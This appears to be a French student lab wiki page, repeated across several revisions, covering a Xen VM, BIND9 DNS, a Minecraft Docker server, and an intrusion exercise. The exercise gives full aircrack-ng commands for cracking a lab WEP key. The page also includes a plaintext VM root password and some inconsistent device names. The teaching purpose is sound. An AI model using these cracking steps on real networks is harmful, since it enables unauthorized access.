vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt-get install aircrack-ng

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

== WPA ==

Nous allons utiliser le même logiciel que pour WEP (aircrack)

=MINECRAFT=

Nous allons installer un serveur minecraft sur notre VM

Pour cela nous allons avoir besoin de DOCKER
apt-get install docker

Une fois l'installation faite nous devons prendre une image de serveur minecraft:
docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server

Cette image vient du github: https://github.com/itzg/docker-minecraft-server

Nous mettons le port 25565 car c'est le port utilisé par minecraft

Une fois cela fait nous pouvons visualiser les docker activité
docker ps

[[Fichier:Minecraft.png]]

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:43:52Z

Hguyard : /* Intrusion */

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:42:45Z

Hguyard : /* Sommaire */

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:40:17Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt-get install aircrack-ng

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

Fichier:CléWEP.jpeg

2022-11-28T09:37:53Z

Hguyard :

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:37:43Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt install aircrack

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:36:23Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt install aircrack

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.png]]

Fichier:WEP Liste.jpg

2022-11-28T09:27:11Z

Hguyard :

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:26:53Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt install aircrack

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)
[[Fichier:WEP_Liste.jpg]]

TP sysres SE2a5 2022/2023 G1

2022-11-10T10:52:34Z

Hguyard : /* Création de la VM */

TP sysres SE2a5 2022/2023 G1

2022-11-10T10:52:00Z

Hguyard : /* Création de la VM */

TP sysres SE2a5 2022/2023 G1

2022-11-10T10:51:40Z

Hguyard : /* Création de la VM */

TP sysres SE2a5 2022/2023 G1

2022-11-10T10:45:53Z

Hguyard : /* Création de la VM */

== Cahier de suivi - Groupe 1 ==

= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/Kronenbourg.cfg :
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvda3,w',
'phy:/dev/storage/HG-var,xvda4,w'
